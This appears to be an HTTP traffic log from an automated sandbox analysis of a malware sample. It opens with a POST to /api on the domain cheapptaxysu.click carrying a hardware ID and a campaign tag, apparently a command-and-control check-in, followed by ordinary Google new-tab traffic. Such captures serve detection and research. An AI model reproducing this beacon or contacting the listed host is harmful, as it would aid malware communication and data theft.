                                                                                                                                                                                                                                                            2024-12-21 21:18:20 UTC372OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=PLC6TAD3ORJ8TROG69
                                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=UK5f.kGqs4s6b_2zbAsIvGYwo4.3VSBZmtv09cMrxTk-1734815877-0.0.1.1-/api
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1448
                                                                                                                                                                                                                                                            Host: cheapptaxysu.click
                                                                                                                                                                                                                                                            2024-12-21 21:18:20 UTC1448OUTData Raw: 2d 2d 50 4c 43 36 54 41 44 33 4f 52 4a 38 54 52 4f 47 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 4c 43 36 54 41 44 33 4f 52 4a 38 54 52 4f 47 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 4c 43 36 54 41 44 33 4f 52 4a 38 54 52 4f 47 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f
                                                                                                                                                                                                                                                            Data Ascii: --PLC6TAD3ORJ8TROG69Content-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--PLC6TAD3ORJ8TROG69Content-Disposition: form-data; name="pid"1--PLC6TAD3ORJ8TROG69Content-Disposition: form-data; name="lid"CZJvss--geopo
                                                                                                                                                                                                                                                            2024-12-21 21:18:21 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:21 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=4l414ue3grpu64s82vj1ne7l8g; expires=Wed, 16 Apr 2025 15:05:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rJvdrIQbhsdI%2Bc%2BSYKyftlz3mX7AGZh9I9Y0rIM4Zl2Bpxwb5zMa2C49AkXqe1Z24pDJt2KFEBRsx%2Bez3XWZFeU%2BQqL9Zj3r3WIVLLn0gwKg%2BQPIcablh88VmDaV6klhXo2M3Ak%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae773ebd4436e-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1762&rtt_var=661&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2456&delivery_rate=1657207&cwnd=235&unsent_bytes=0&cid=e6eb224b4e1b2a24&ts=1369&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:18:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            62192.168.2.449980142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:24 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:24 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-LydGiP3piqEMA2XSvE_suw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC124INData Raw: 33 35 30 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 66 69 6e 61 6c 20 6a 65 6f 70 61 72 64 79 20 71 75 65 73 74 69 6f 6e 22 2c 22 68 6f 77 20 74 68 65 20 62 65 6e 67 61 6c 73 20 63 61 6e 20 6d 61 6b 65 20 74 68 65 20 70 6c 61 79 6f 66 66 73 22 2c 22 6d 63 64 6f 6e 61 6c 64 5c 75 30 30 32 37 73 20 6d 65 6e 75 20 32 30 32 35 22 2c 22 6d 69 6c 69 74 61 72 79 20 68 65 6c 69 63
                                                                                                                                                                                                                                                            Data Ascii: 350)]}'["",["final jeopardy question","how the bengals can make the playoffs","mcdonald\u0027s menu 2025","military helic
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC731INData Raw: 6f 70 74 65 72 20 63 72 61 73 68 20 63 61 6d 70 20 70 65 6e 64 6c 65 74 6f 6e 22 2c 22 67 65 6e 73 68 69 6e 20 69 6d 70 61 63 74 20 35 2e 33 20 6c 69 76 65 73 74 72 65 61 6d 20 63 6f 64 65 73 22 2c 22 77 6f 72 64 6c 65 20 61 6e 73 77 65 72 20 64 65 63 65 6d 62 65 72 20 32 31 22 2c 22 61 72 63 74 69 63 20 63 61 74 20 73 6e 6f 77 6d 6f 62 69 6c 65 73 22 2c 22 6e 79 20 72 61 6e 67 65 72 73 20 74 72 61 64 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52
                                                                                                                                                                                                                                                            Data Ascii: opter crash camp pendleton","genshin impact 5.3 livestream codes","wordle answer december 21","arctic cat snowmobiles","ny rangers trade"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmR
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            63192.168.2.449979142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:24 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            64192.168.2.449977142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:24 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:24 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC372INData Raw: 32 63 32 30 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                            Data Ascii: 2c20)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                            Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                            Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                            Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                            Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 38 35 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61
                                                                                                                                                                                                                                                            Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700285,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){va
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC1390INData Raw: 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72
                                                                                                                                                                                                                                                            Data Ascii: c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC1390INData Raw: 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33
                                                                                                                                                                                                                                                            Data Ascii: rn a.i;throw Error(\"F\");};_.Xd\u003dfunction(a){if(Wd.test(a))return a};_.Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003
                                                                                                                                                                                                                                                            2024-12-21 21:18:25 UTC1202INData Raw: 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64
